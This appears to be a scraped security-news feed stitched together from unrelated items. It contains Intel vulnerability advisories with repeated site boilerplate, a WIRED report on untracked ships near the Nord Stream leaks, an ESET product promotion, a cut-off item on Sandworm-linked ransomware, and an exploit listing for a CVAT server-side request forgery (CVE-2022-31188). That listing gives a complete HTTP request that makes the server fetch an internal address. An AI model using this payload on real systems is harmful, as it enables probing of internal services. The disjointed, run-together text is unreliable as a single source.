Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi software before version 22.140 may allow an unauthenticated user to potentially enable denial of service via adjacent access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® PROSet/Wireless WiFi Software Advisory**

**Summary: **

A potential security vulnerability in some Intel® PROSet/Wireless WiFi software may allow denial of service. Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-28667

Description: Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi software before version 22.140 may allow an unauthenticated user to potentially enable denial of service via adjacent access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**Affected Products:**

Intel® PROSet/Wireless WiFi software before version 22.140.

CVE ID

Affected Products

Affected OS

CVE-2022-28667

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Intel® Wireless-AC 9560

Intel® Wireless-AC 9462

Intel® Wireless-AC 9461

Intel® Wireless-AC 9260

Intel® Dual Band Wireless-AC 8265

Intel® Dual Band Wireless-AC 8260

Intel® Dual Band Wireless-AC 3168

Intel® Wireless 7265 (Rev D) Family

Intel® Dual Band Wireless-AC 3165

Linux

Chrome OS

**Recommendations:**

**Chrome OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed to Chromium by November 08, 2022.

For any Google Chrome OS solution and schedule, please contact Google directly.

**Linux OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed by November 08, 2022.

Consult the regular open-source channels to obtain this update.

**Acknowledgements:**

The following issue was found internally by an Intel employee.  Intel would like to thank Julien Lenoir.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-28667: INTEL-SA-00687

Uncontrolled search path element in the Intel(R) Advanced Link Analyzer Pro before version 22.2 and Standard edition software before version 22.1.1 STD may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Advanced Link Analyzer Advisory**

**Summary: **

A potential security vulnerability in the Intel® Advanced Link Analyzer Pro and Standard edition software may allow escalation of privilege.  Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-27638

Description: Uncontrolled search path element in the Intel(R) Advanced Link Analyzer Pro before version 22.2 and Standard edition software before version 22.1.1 STD may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® Advanced Link Analyzer Pro edition software before version 22.2.

Intel® Advanced Link Analyzer Standard edition software before version 22.1.1 STD.

**Recommendations:**

Intel recommends updating the Intel® Advanced Link Analyzer Pro edition software to version 22.2 or later.

Intel recommends updating the Intel® Advanced Link Analyzer Standard edition software to version 22.1.1 STD or later.

Updates are available for download at these locations:

Pro edition: https://www.intel.com/content/www/us/en/software-kit/727932

Standard edition: https://www.intel.com/content/www/us/en/software-kit/684357

**Acknowledgements:**

Intel would like to thank Amin Saidani for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-27638: INTEL-SA-00715

Premature release of resource during expected lifetime in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® SGX SDK Advisory**

**Summary: **

A potential security vulnerability in the Intel® Software Guard Extensions (SGX) Software Development Kit (SDK) may allow information disclosure.  Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-27499

Description: Premature release of resource during expected lifetime in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 2.5 Low

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N

**Affected Products:**

Intel® SGX SDK software for Linux before version 2.18.100.1.

Intel® SGX SDK software for Windows before version 2.17.100.1.

**Recommendations:**

Intel recommends updating Intel® SGX SDK software for Linux to version 2.18.100.1 or later.

Updates are available for download at this location:  
https://download.01.org/intel-sgx/sgx-linux/

Intel recommends updating Intel® SGX SDK software for Windows to version 2.17.100.1 or later.

Updates are available for download at this location:  
https://registrationcenter.intel.com/en/products/download/3407/

**Acknowledgements:**

Intel would like to thank Hongliang Tian, Weijie Liu, and Shoumeng Yan for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-27499: INTEL-SA-00691

Uncontrolled search path element in the Intel(R) Quartus Prime Standard edition software before version 21.1 Patch 0.02std may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Quartus® Advisory**

Intel ID:

INTEL-SA-00659

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Information Disclosure

Severity rating:

MEDIUM

Original release:

11/08/2022

Last revised:

11/08/2022

**Summary: **

Potential security vulnerabilities in the Intel® Quartus Prime Pro and Standard edition software may allow escalation of privilege or information disclosure.  Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-27187

Description: Uncontrolled search path element in the Intel(R) Quartus Prime Standard edition software before version 21.1 Patch 0.02std may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVEID: CVE-2022-27233

Description: XML injection in the Intel(R) Quartus Prime Pro and Standard edition software may allow an unauthenticated user to potentially enable information disclosure via network access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

**Affected Products:**

Intel® Quartus Prime Pro edition software before version 22.1.

Intel® Quartus Prime Standard edition software before version 21.1 Patch 0.02std.

**Recommendations:**

Intel recommends updating the Intel® Quartus Prime Pro edition software to version 22.1 or later.

Intel recommends updating the Intel® Quartus Prime Standard edition software to version 21.1 Patch 0.02std or later.

Updates are available for download at these locations:

http://fpgasoftware.intel.com/?edition=pro

http://fpgasoftware.intel.com/?edition=standard

**Acknowledgements:**

Intel would like to thank avivanoa (CVE-2022-27187), Julien Ahrens from RCE Security (CVE-2022-27233) for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-27187: INTEL-SA-00659

Protection mechanism failure in the Intel(R) DCM software before version 5.0 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® DCM Advisory**

**Summary:**

A potential security vulnerability in the Intel® Data Center Manager (DCM) software may allow escalation of privilege.  Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-33942

Description: Protection mechanism failure in the Intel(R) DCM software before version 5.0 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**Affected Products:**

Intel® DCM software before version 5.0.

**Recommendation:**

Intel recommends updating the Intel® DCM software to version 5.0 or later.

Updates are available for download at this location: https://www.intel.com/content/www/us/en/download/645992

**Acknowledgements:**

Intel would like to thank Julien Ahrens from RCE Security for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-33942: INTEL-SA-00713

CVAT version 2.0 suffers from a server-side request forgery vulnerability.

    #Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)#Exploit Author: Emir Polat#Vendor Homepage: https://github.com/opencv/cvat#Version: < 2.0.0#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)#CVE: CVE-2022-31188# Description:#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. #Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.POST /api/v1/tasks/2/data HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0Accept: application/json, text/plain, */*Accept-Language:en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Token 06d88f739a10c7533991d8010761df721b790b7X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGVContent-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436Content-Length: 569Origin: http://localhost:8080Connection: closeReferer:http://localhost:8080/tasks/createCookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dnedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="remote files[0]"http://localhost:8081-----------------------------251652214142138553464236533436Content-Disposition: form-data; name=" image quality"170-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="use zip chunks"true-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="use cache"true-----------------------------251652214142138553464236533436--

CVAT 2.0 Server-Side Request Forgery

Satellite monitors discovered two vessels with their trackers turned off in the area of the pipeline prior to the suspected sabotage in September.

The first gas leaks on the Nord Stream 2 pipeline in the Baltic Sea were detected in the early hours of September 26, pouring up to 400,000 tons of methane into the atmosphere. Officials immediately suspected sabotage of the international pipeline. New analysis seen by WIRED shows that two large ships, with their trackers off, appeared around the leak sites in the days immediately before they were detected.

According to the analysis by satellite data monitoring firm SpaceKnow, the two “dark ships,” each measuring around 95 to 130 meters long, passed within several miles of the Nord Stream 2 leak sites. “We have detected some dark ships, meaning vessels that were of a significant size, that were passing through that area of interest,” says Jerry Javornicky, the CEO and cofounder of SpaceKnow. “They had their beacons off, meaning there was no information about their movement, and they were trying to keep their location information and general information hidden from the world,” Javornicky adds.

The discovery, which was made by analyzing images from multiple satellites, is likely to further increase speculation about the cause of the blasts. Multiple countries investigating the incident believe the Nord Stream 1 and 2 pipelines were rocked by a series of explosions, with many suspicions directed at Russia as its full-scale invasion of Ukraine continues. (Russia has denied its involvement.) Once SpaceKnow identified the ships, it reported its findings to officials at NATO, who are investigating the Nord Stream incidents. Javornicky says NATO officials asked the company to provide more information. 

NATO spokesperson Oana Lungescu says it does not comment on the “details of our support or the sources used” but confirmed that NATO believes the incident was a “deliberate and irresponsible act of sabotage” and it has increased its presence in the Baltic and North Seas. However, a NATO official, who did not have permission to speak publicly, confirmed to WIRED that NATO had received SpaceKnow’s data and said satellite imagery can prove useful for its investigations.

To detect the ships, Javornicky says, the company scoured 90 days of archived satellite images for the area. The company analyzes images from multiple satellite systems—including paid and free services—and uses machine learning to detect objects within them. This includes the ability to monitor roads, buildings, and changes in landscapes. "We have 38 specific algorithms that can detect military equipment," Javornicky says, adding that SpaceKnow’s system can detect specific models of aircraft on landing strips.

Once it gathered archive images of the area, SpaceKnow created a series of polygons around the gas leak sites. The smallest of these, around 400 square meters, covered the immediate blast area, and larger areas of interest covered several kilometers. In the weeks leading up to the explosions, SpaceKnow detected 25 ships passing through the region, from “cargo ships to multipurpose larger ships,” Javornicky says. In total, 23 of these vessels had their automatic identification system (AIS) transponders turned on. Two did not have AIS data turned on, and these ships passed the area during the days immediately ahead of the leaks being detected.

By international law, large ships are required to install and use AIS. This vessel tracking system was created to help ships navigate and avoid potential collisions with other vessels. When turned on, AIS will broadcast a ship’s name, location, the direction of travel, speed, and other information.

It is relatively rare for ships to turn off their AIS transponders. Ships that “go dark” are often suspected of being involved in illegal fishing or modern slavery, with officials in Europe previously investigating ships that are believed to have turned off their AIS transponders. “It would not be common practice \[to have AIS turned off\], unless the vessels have a classified military mission or they would have some clandestine objectives, because the Baltic Sea is one of the busiest seas in the world in terms of commercial traffic,” says Otto Tabuns, the director of the Baltic Security Foundation, an NGO that focuses on the region.

Tabuns says the Baltic Sea has multiple main “arteries” where ships travel and it is “responsible” for ships in the area to have their AIS trackers turned on. Collisions at sea can be deadly and environmentally ruinous. “There are many places in the \[Baltic\] sea that are not navigable for bigger ships,” Tabuns says. “There are also some areas that are not recommended or where it is prohibited to ship because of the heritage of World War Two.” Decades-old wartime submarines and munitions litter the Baltic Sea’s floor.

SpaceKnow detected the ships that had AIS turned off using synthetic aperture radar (SAR) images from satellites. Most satellites observing Earth take photos of what’s beneath them; others, however, also use SAR to bounce radio waves off the ground and create images from them. Andrey Kurekin, a coastal ocean color scientist at the Plymouth Marine Laboratory who has analyzed satellite images for detecting objects at sea, says SAR technology can be useful for detecting ships, as it shows reflections from metal objects. “They are shown as bright objects in SAR images,” Kurekin says.

Kurekin says SAR images can be used to identify the longitude and latitude coordinates of a ship, the direction it is heading, and potentially to estimate its speed. “The main advantage of SAR over optical sensors is that the microwaves penetrate through clouds,” Kurekin says. The images are less impacted by the weather and can also provide visibility at night. “It's quite difficult to hide a ship from a SAR sensor,” Kurekin adds.

SAR images of the dark ships shared with WIRED show the vessels as glowing objects, not far from the explosion site around Nord Stream 2. “We assume it was one of those two dark ships that we have detected, but we're not making any decision,” Javornicky says. He says the company is not in the business of determining what may have happened or who is responsible but instead provided the data to authorities.

Kurekin cautions that AIS tracking systems onboard ships can, at times, fail. The signal from AIS could stop communicating with satellites or receivers on land, Kurekin says, adding that the signal can be impacted by the weather too. “If there is a vessel that you can see in SAR image but it's not reported by the AIS system, it does not necessarily mean that there's something wrong with this vessel,” Kurekin says. Signals from AIS transponders can also be manipulated—warships have had their AIS data spoofed, and ships around Russia and the Black Sea have vanished from trackers in recent years.

While there are multiple ongoing investigations into the explosions, determining the full picture of what happened may take some time. Police in Copenhagen said its initial investigations have determined that “powerful explosions” caused “extensive damage” to the pipes. Images taken from around the exploded sections of the pipe appear to show that at least 50 meters of the pipeline were destroyed in the explosions.

In an email, the Swedish security service, Säkerhetspolisen, said that due to “secrecy” around its operations, it could not discuss its investigation or whether it was looking at satellite data. However, agency spokesperson Gabriel Wernstedt says the organization is conducting a “criminal investigation of gross sabotage” around both the Nord Stream 1 and 2 pipes. “Certain seizures were made during the onsite investigations that are being analyzed,” Wernstedt says. In public statements, Säkerhetspolisen has confirmed denotations happened at the pipes and that the Swedish armed forces are involved in the investigations.

However, while the investigations are ongoing, there appear to be difficulties between the countries that are looking into the incident, which could slow the process. While Sweden says it is working with investigators in Germany and Denmark, the official leading its investigation has rejected plans to form a joint investigation.

Tabuns says he hopes that the incident will act as motivation for countries to work on better ways to share intelligence, particularly as Sweden and Finland apply to join NATO. Each country will have its own levels of classification for information and systems where it collects intelligence—these may often not be compatible, Tabuns says. However, he adds that the events should see countries look at increasing the “integration of existing national systems so that there would be real-time information sharing for any response.”

_Update 9:30 am, 11-11-22: Added statement from NATO._

‘Dark Ships’ Emerge From the Shadows of the Nord Stream Mystery

It's no secret that antivirus software is as essential to your computer as a power cord.
However, the threats don't stop at your devices. For example, criminals trying to steal your data can attack your Wi-Fi router, and phishing attempts can target your email. 
ESET's latest consumer product release takes a comprehensive approach to security to guard against a full range of threats. All are

It's no secret that antivirus software is as essential to your computer as a power cord.

However, the threats don't stop at your devices. For example, criminals trying to steal your data can attack your Wi-Fi router, and phishing attempts can target your email.

ESET's latest consumer product release takes a comprehensive approach to security to guard against a full range of threats. All are built with ESET's signature light footprint for gaming, browsing, shopping and socializing with no interruptions or slowdowns.

****Introducing enhanced security for Windows, Mac and Android****

For more than 30 years, ESET® has created industry-leading IT security software and services, protecting businesses worldwide from ever-evolving digital threats.

ESET's solutions for consumers use the same advanced technologies. By protecting your digital life, ESET delivers real-world protection against criminals trying to steal your identity, hack your bank account or lock down your computer.

As cyberthreats and hackers keep evolving, ESET's always a step ahead. Here's a look at the new product updates:

****ESET Essential Security****

**ESET NOD32 Antivirus for Windows & macOS**

As ESET's entry-level product, ESET NOD32 Antivirus is anything but basic. In addition to defending against malware and phishing attempts, this new version includes:

*   **Advanced machine learning:** Proactive technology designed to detect never-before-seen malware.
*   **DNA detection:** Uses code analysis to extract the "genes" responsible for a specific virus behavior to detect others like it.
*   **Exploit blocker:** Helps block zero-day exploits by monitoring for suspicious activity.
*   **Intel Threat Detection Technology:** Boosts ransomware protection by integrating Intel's hardware-based ransomware detection technology.

****ESET Advanced Security****

**ESET Internet Security for Windows, macOS & Android**

ESET Internet Security now offers additional layers of defense for your home network and smart devices and an updated secure browser feature.

Highlights include:

*   **Multi-platform coverage:** Secures all your devices (smartphone, laptop, smart TV, tablet, etc.) and the network they're connected to.
*   **Secure browser mode:** Encrypts all communication between the keyboard and browser for safer gaming, socializing and browsing.
*   **Brute Force Attack Protection:** Blocks attacks that attempt to guess your password and access your by feeding large volumes of previously breached passwords
*   **Banking and payment protection:** Includes a new and improved plugin that keeps personal information from being stolen while shopping, banking and paying online.
*   **Intel Threat Detection Technology:** Boosts ransomware protection by integrating Intel's hardware-based ransomware detection technology.

****ESET Premium Security****

**ESET Smart Security Premium for Windows, macOS & Android**

ESET's flagship product adds cloud sandbox analysis, a password manager and encryption for the ultimate in security.

New features include:

*   **ESET LiveGuard:** Personalized virus detection system that works with documents, scripts, installers, and executable files. Suspicious files are run in a safe, sandboxed environment before being cleared for release or deleted.

*   **Military-grade encryption software:** Designed to keep the files on your computer safe and those on any external drivers.

*   **Password management:** Generates strong encrypted passwords and stores them securely.

*   **iOS face detection:** For macOS users, integrates into the password management feature along with Google Authenticator's two-factor authentication.

_NOTE: All of ESET's consumer products include simplified security management via the ESET HOME user hub._

When technology enables progress, ESET is here to protect it. **Learn more here.**

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

ESET Antivirus: Advanced Protection Solutions for Home Users and Businesses

Microsoft on Thursday attributed the recent spate of ransomware incidents targeting transportation and logistics sectors in Ukraine and Poland to a threat cluster that shares overlaps with the Russian state-sponsored Sandworm group.
The attacks, which were disclosed by the tech giant last month, involved a strain of previously undocumented malware called Prestige and is said to have taken place

Microsoft on Thursday attributed the recent spate of ransomware incidents targeting transportation and logistics sectors in Ukraine and Poland to a threat cluster that shares overlaps with the Russian state-sponsored Sandworm group.

The attacks, which were disclosed by the tech giant last month, involved a strain of previously undocumented malware called Prestige and is said to have taken place within an hour of each other across all victims.

The Microsoft Threat Intelligence Center (MSTIC) is now tracking the threat actor under its element-themed moniker Iridium (née DEV-0960), citing overlaps with Sandworm (aka Iron Viking, TeleBots, and Voodoo Bear).

"This attribution assessment is based on forensic artifacts, as well as overlaps in victimology, tradecraft, capabilities, and infrastructure, with known Iridium activity," MSTIC said in an update.

The company also further assessed the group to have orchestrated compromise activity targeting many of the Prestige victims as far back as March 2022, before culminating in the deployment of the ransomware on October 11.

